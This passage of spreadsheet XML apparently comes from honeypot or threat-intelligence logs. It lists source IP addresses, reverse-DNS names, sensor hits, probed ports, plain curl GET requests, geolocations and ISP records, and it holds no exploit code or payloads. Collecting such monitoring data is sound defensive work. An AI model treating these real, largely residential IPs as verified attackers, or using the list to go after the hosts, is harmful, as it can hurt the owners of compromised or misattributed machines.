    <t>NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.60.209.6:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '94.131.113.33:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '66.94.127.183:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '193.57.136.113:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '185.250.150.39:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '144.126.148.5:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '154.93.37.45:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}</t>
  </si>
  <si>
    <t>::ffff:7a75:7a2f</t>
  </si>
  <si>
    <t>426c4fb1a216565cb127a633214d56dd</t>
  </si>
  <si>
    <t>46.118.74.238</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_SSH_H13&amp;&amp;SMA-LAB_MT-CPA_H30&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H9</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;23&amp;&amp;22&amp;&amp;9546&amp;&amp;NA</t>
  </si>
  <si>
    <t>::ffff:2e76:4aee</t>
  </si>
  <si>
    <t>3e45468fed2d25a52394e490671f791f</t>
  </si>
  <si>
    <t>117.219.70.49</t>
  </si>
  <si>
    <t>::ffff:75db:4631</t>
  </si>
  <si>
    <t>94a8bf9c958575f3eb702ace99e96b19</t>
  </si>
  <si>
    <t>125.228.195.225</t>
  </si>
  <si>
    <t>NA&amp;&amp;125-228-195-225.hinet-ip.hinet.net</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_HTTP_H22&amp;&amp;SMA-LAB_HTTP_H12&amp;&amp;SMA-LAB_HTTP_H6&amp;&amp;SMA-LAB_HTTP_H9&amp;&amp;SMA-LAB_HTTP_H8&amp;&amp;SMA-LAB_HTTP_H11&amp;&amp;SMA-LAB_HTTP_H13&amp;&amp;SMA-LAB_MT-CPA_H9&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H30&amp;&amp;SMA-LAB_TELNET_H25&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_MT-CPA_H19&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H34</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;80&amp;&amp;5352&amp;&amp;23&amp;&amp;58004&amp;&amp;20670&amp;&amp;46753</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '154.26.156.60:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '66.94.127.183:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}</t>
  </si>
  <si>
    <t>::ffff:7de4:c3e1</t>
  </si>
  <si>
    <t>9fd7c9dec68ca41df80c245c58d10db4</t>
  </si>
  <si>
    <t>59.126.83.83</t>
  </si>
  <si>
    <t>59-126-83-83.hinet-ip.hinet.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_HTTP_H11&amp;&amp;SMA-LAB_HTTP_H3&amp;&amp;SMA-LAB_HTTP_H16&amp;&amp;SMA-LAB_SMB_H42&amp;&amp;SMA-LAB_MT-CPA_H15&amp;&amp;SMA-LAB_HTTP_H22&amp;&amp;SMA-LAB_HTTP_H10&amp;&amp;SMA-LAB_HTTP_H13&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H13&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H28&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H18</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;80&amp;&amp;445&amp;&amp;8981&amp;&amp;23&amp;&amp;9100</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.60.224.106:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '185.250.150.39:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}</t>
  </si>
  <si>
    <t>::ffff:3b7e:5353</t>
  </si>
  <si>
    <t>236c5d107bc633ff8c7c9d5cc56227d3</t>
  </si>
  <si>
    <t>195.32.4.109</t>
  </si>
  <si>
    <t>host109-4-32-195.dimensionesrl.eu&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MT-CPA_H41&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H28&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H4&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H31&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H9</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;6920&amp;&amp;23</t>
  </si>
  <si>
    <t>202870</t>
  </si>
  <si>
    <t>Dimensione S.r.l.</t>
  </si>
  <si>
    <t>DIMENSIONE Srl</t>
  </si>
  <si>
    <t>1996-04-11</t>
  </si>
  <si>
    <t>dns2.dimensione.com
        dns3.dimensione.com
        dns1.dimensione.com
Please visit www.eurid.eu for more info.</t>
  </si>
  <si>
    <t>SeFlow Srl</t>
  </si>
  <si>
    <t>::ffff:c320:46d</t>
  </si>
  <si>
    <t>48ec2e0db8bfea12fba230123bd82bfb</t>
  </si>
  <si>
    <t>220.135.10.143</t>
  </si>
  <si>
    <t>220-135-10-143.hinet-ip.hinet.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MT-CPA_H43&amp;&amp;SMA-LAB_TELNET_H2&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H30&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H13&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_HTTP_H4&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H16</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;889&amp;&amp;23&amp;&amp;80&amp;&amp;9100&amp;&amp;40105&amp;&amp;40124</t>
  </si>
  <si>
    <t>::ffff:dc87:a8f</t>
  </si>
  <si>
    <t>b688772330d12a0b7eb2e4026e8ee052</t>
  </si>
  <si>
    <t>59.182.24.25</t>
  </si>
  <si>
    <t>::ffff:3bb6:1819</t>
  </si>
  <si>
    <t>1c70fa29db0d4d5b0f4bacc8a944f02a</t>
  </si>
  <si>
    <t>49.244.149.168</t>
  </si>
  <si>
    <t>Makwanpur</t>
  </si>
  <si>
    <t>Hetauda</t>
  </si>
  <si>
    <t>1283339</t>
  </si>
  <si>
    <t>27.4368</t>
  </si>
  <si>
    <t>85.0026</t>
  </si>
  <si>
    <t>Nepal Telecommunications Corporation Cellular Mobile and New Services</t>
  </si>
  <si>
    <t>2010-11-11</t>
  </si>
  <si>
    <t>NTCINTERNET</t>
  </si>
  <si>
    <t>::ffff:31f4:95a8</t>
  </si>
  <si>
    <t>fddb2f4f92dd10d33c29a3cb7fe37e93</t>
  </si>
  <si>
    <t>122.117.239.244</t>
  </si>
  <si>
    <t>122-117-239-244.hinet-ip.hinet.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_HTTP_H3&amp;&amp;SMA-LAB_HTTP_H10&amp;&amp;SMA-LAB_MT-CPA_H16&amp;&amp;SMA-LAB_HTTP_H21&amp;&amp;SMA-LAB_HTTP_H4&amp;&amp;SMA-LAB_HTTP_H7&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H2&amp;&amp;SMA-LAB_TELNET_H6&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H35&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_MT-CPA_H41&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_HTTP_H39&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_TELNET_H26</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;23&amp;&amp;80&amp;&amp;23595&amp;&amp;55183&amp;&amp;55212&amp;&amp;55256&amp;&amp;9100</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.60.171.39:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '185.250.150.39:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.54.117.64:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}</t>
  </si>
  <si>
    <t>::ffff:7a75:eff4</t>
  </si>
  <si>
    <t>233433f91c7f871cd7ca7460bc5ed705</t>
  </si>
  <si>
    <t>122.117.234.12</t>
  </si>
  <si>
    <t>::ffff:7a75:ea0c</t>
  </si>
  <si>
    <t>3f483fa92bc8f0b4042955ee7b8f6996</t>
  </si>
  <si>
    <t>59.98.236.209</t>
  </si>
  <si>
    <t>::ffff:3b62:ecd1</t>
  </si>
  <si>
    <t>12ba1c2fe4a331f818cc80e6f2b9540f</t>
  </si>
  <si>
    <t>117.209.93.157</t>
  </si>
  <si>
    <t>::ffff:75d1:5d9d</t>
  </si>
  <si>
    <t>ff535a10beb9366f65470b299e2999e3</t>
  </si>
  <si>
    <t>59.126.85.114</t>
  </si>
  <si>
    <t>NA&amp;&amp;59-126-85-114.hinet-ip.hinet.net</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_MT-CPA_H1&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_MT-CPA_H44&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_HTTP_H11&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H6&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_MT-CPA_H38&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H13&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H5</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;23&amp;&amp;16231&amp;&amp;17964&amp;&amp;50348&amp;&amp;80&amp;&amp;33548&amp;&amp;9100&amp;&amp;50299&amp;&amp;NA</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '66.94.127.183:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '185.74.222.213:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.54.117.64:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '185.250.150.39:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.60.171.39:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}</t>
  </si>
  <si>
    <t>::ffff:3b7e:5572</t>
  </si>
  <si>
    <t>4651a50b37e5e22ba4fa880a29ae1e94</t>
  </si>
  <si>
    <t>175.106.37.179</t>
  </si>
  <si>
    <t>55330</t>
  </si>
  <si>
    <t>GCN-DCN-AS</t>
  </si>
  <si>
    <t>::ffff:af6a:25b3</t>
  </si>
  <si>
    <t>1530a2f63b7b5f51e3d7b041b2f70f89</t>
  </si>
  <si>
    <t>125.228.160.16</t>
  </si>
  <si>
    <t>NA&amp;&amp;125-228-160-16.hinet-ip.hinet.net</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_HTTP_H16&amp;&amp;SMA-LAB_HTTP_H9&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H13&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_HTTP_H14&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_TELNET_H28&amp;&amp;SMA-LAB_TELNET_H30&amp;&amp;SMA-LAB_TELNET_H33</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;80&amp;&amp;23&amp;&amp;36688&amp;&amp;4877</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '103.113.68.70:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '193.57.136.113:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}</t>
  </si>
  <si>
    <t>::ffff:7de4:a010</t>
  </si>
  <si>
    <t>e1dbf406fd05436ac68b1f42fbf0533f</t>
  </si>
  <si>
    <t>125.228.64.4</t>
  </si>
  <si>
    <t>125-228-64-4.hinet-ip.hinet.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MT-CPA_H40&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H13&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H30</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;27456&amp;&amp;23&amp;&amp;9100&amp;&amp;47376&amp;&amp;53829&amp;&amp;53851&amp;&amp;80</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '103.113.68.70:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '66.94.127.183:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}</t>
  </si>
  <si>
    <t>::ffff:7de4:4004</t>
  </si>
  <si>
    <t>7b9781a8e3ce6d6aa93e2459502da733</t>
  </si>
  <si>
    <t>81.182.248.107</t>
  </si>
  <si>
    <t>dsl51B6F86B.fixip.t-online.hu&amp;&amp;NA</t>
  </si>
  <si>
    <t>Untrusted Incomming Traffic&amp;&amp;Suspicious Web Activity Detected&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic</t>
  </si>
  <si>
    <t>SMA-LAB_HTTP_H47&amp;&amp;SMA-LAB_TELNET_HC1</t>
  </si>
  <si>
    <t>37215&amp;&amp;23</t>
  </si>
  <si>
    <t>Budapest (XI. kerület)</t>
  </si>
  <si>
    <t>1117</t>
  </si>
  <si>
    <t>47.4744</t>
  </si>
  <si>
    <t>19.0486</t>
  </si>
  <si>
    <t>Hungarian Telecom</t>
  </si>
  <si>
    <t>Axelero Co</t>
  </si>
  <si>
    <t>connection&amp;&amp;POST</t>
  </si>
  <si>
    <t>::ffff:51b6:f86b</t>
  </si>
  <si>
    <t>95b4351abd99c98f0dc2ff5928754011</t>
  </si>
  <si>
    <t>182.59.201.61</t>
  </si>
  <si>
    <t>::ffff:b63b:c93d</t>
  </si>
  <si>
    <t>40ae2524929217e72b3cf3333cb8171e</t>
  </si>
  <si>
    <t>202.17.141.202</t>
  </si>
  <si>
    <t>st0170.nas811.p-akita.nttpc.ne.jp&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H35&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_DNS_H44&amp;&amp;SMA-LAB_MT-CPA_H8&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H13&amp;&amp;SMA-LAB_TELNET_H25&amp;&amp;SMA-LAB_TELNET_H18</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;23&amp;&amp;53&amp;&amp;53122</t>
  </si>
  <si>
    <t>Ōta</t>
  </si>
  <si>
    <t>Den’enchōfu</t>
  </si>
  <si>
    <t>1864381</t>
  </si>
  <si>
    <t>35.5955</t>
  </si>
  <si>
    <t>139.665</t>
  </si>
  <si>
    <t>1993-12-08</t>
  </si>
  <si>
    <t>::ffff:ca11:8dca</t>
  </si>
  <si>
    <t>ca76328c2ad687c2f4c8195a7af954f8</t>
  </si>
  <si>
    <t>114.33.108.101</t>
  </si>
  <si>
    <t>NA&amp;&amp;114-33-108-101.hinet-ip.hinet.net</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_HTTP_H39&amp;&amp;SMA-LAB_MT-CPA_H13&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H13&amp;&amp;SMA-LAB_HTTP_H13&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H18</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;23&amp;&amp;80&amp;&amp;11647&amp;&amp;9100</t>
  </si>
  <si>
    <t>::ffff:7221:6c65</t>
  </si>
  <si>
    <t>867bccef4f56215741476e3b5d73f61a</t>
  </si>
  <si>
    <t>117.235.60.71</t>
  </si>
  <si>
    <t>::ffff:75eb:3c47</t>
  </si>
  <si>
    <t>43e634362ee75beec08d16af2ee8d7f8</t>
  </si>
  <si>
    <t>220.132.187.195</t>
  </si>
  <si>
    <t>NA&amp;&amp;220-132-187-195.hinet-ip.hinet.net</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_SOCKS5_H10&amp;&amp;SMA-LAB_PJL_H44&amp;&amp;SMA-LAB_SIP_H35&amp;&amp;SMA-LAB_MYSQL_H17&amp;&amp;SMA-LAB_VNC_H13&amp;&amp;SMA-LAB_SMTP_H5&amp;&amp;SMA-LAB_MT-CPA_H41&amp;&amp;SMA-LAB_TELNET_H3&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H30&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H25&amp;&amp;SMA-LAB_TELNET_H35&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H8</t>
  </si>
  <si>
